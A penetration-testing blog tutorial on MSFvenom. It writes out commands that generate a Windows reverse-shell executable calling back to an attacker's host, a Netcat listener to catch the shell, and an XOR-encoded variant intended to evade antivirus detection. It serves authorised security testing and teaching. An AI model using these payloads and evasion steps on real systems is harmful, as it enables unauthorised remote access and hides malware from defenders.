, ,

Cool Tools Series: How MSFvenom Powers Penetration Testing

the exploit blog logo
The Exploit: Penetration Testing Insights From The Frontlines
Posted on October 8, 2024
Cool Tools Series: MSFvenom

Written by Nathan Anderson

In this post in the Cool Tools series, I’m going to share some tips on getting started with MSFvenom and how it can help you obtain a reverse shell on your penetration tests. If you missed Andrew Trexler’s recent Nuclei blog, be sure to check that out when you finish here!

MSFvenom is a great tool for generating shellcode quickly, with both encryption and/or encoding options available to help prevent AV detection.

The Basics

MSFvenom is part of the Metasploit framework and comes installed with Kali Linux but can also be installed using the following command:

sudo apt install Metasploit-framework

Payloads

The tool has a variety of payloads for different purposes, for specific Operating Systems (including Windows and Linux), and for a large list of web application architectures. A list of all payloads can be obtained from the tool with this command:

msfvenom -l payloads

A full list of options can be obtained from the tool using:

msfvenom –help

Running a Payload

For this example, we will assume that we are running our payload on a computer on a shared internal network. To gain a reverse shell on a target system, we will first need to discover our internal IP address and setup a listener port.

First we will generate a reverse shell payload for a Windows machine as an .exe file, without any additional options:

msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=<Your listening port> -f exe > rev-shell.exe
Generating a reverse shell payload with MSFvenom

Next we place the reverse shell file, now called rev-shell.exe, on the host we are attacking.

After that, we open up a listener port using Netcat with the following command:

nc -lp 9897
Netcat

We see that netcat is actively listening on TCP/9897.

If we execute the payload on the attacking host, we should get a shell on Netcat:

Executing the payload and getting a shell

Bypassing Antivirus

This version of the payload generated by MSFvenom  will quickly be picked up by most AV solutions. When running the generated payload through VirusTotal we see 64/75 detection engines pick up the reverse shell payload as a virus:

VirusTotal results are 64

Let’s regenerate the payload with encoding applied in 10 iterations, using the following command:

msfvenom -p windows/x64/custom/reverse_tcp --encoder x64/xor -i 10 LHOST=<your IP Address> LPORT=<preferred port number> -f exe > rev-shell_encoded.exe
MSFvenom with encoding

Sending that file through VirusTotal, we see that 57/75 detection engines pick the payload up at a threat:

VirusTotal results are 64

There are many features within MSFvenom to help obfuscate the payload from antivirus software and to help bypass AV detection while in transit.

In Conclusion

You can explore more information regarding MSFvenom and the entire Metasploit-framework here: https://www.offsec.com/metasploit-unleashed/msfvenom

I hope you’ve enjoyed this look at MSFvenom. We hope you’ll take a look at the next post in the Cool Tools series as well.

Nathan Anderson

Nathan Anderson
Nathan has been working in Information Technology and Cybersecurity for nine years and has competed in several Capture The Flag (CTFs) events. He holds the Offensive Security Certified Professional (OSCP) certification and, for the past five years, has enjoyed using his skills in the Penetration Testing and Network Security realms. In his off time, when he’s not taking part in a CTF, security research, or working on a new IoT project, he enjoys building furniture and hiking.

Search The Exploit Blog

Blog Categories

Stay up to date with the latest in penetration testing

Name(Required)
Newsletter(Required)
Do you wish to join our newsletter? We send out emails once a month that cover the latest in cybersecurity news. We do not sell your information to other parties.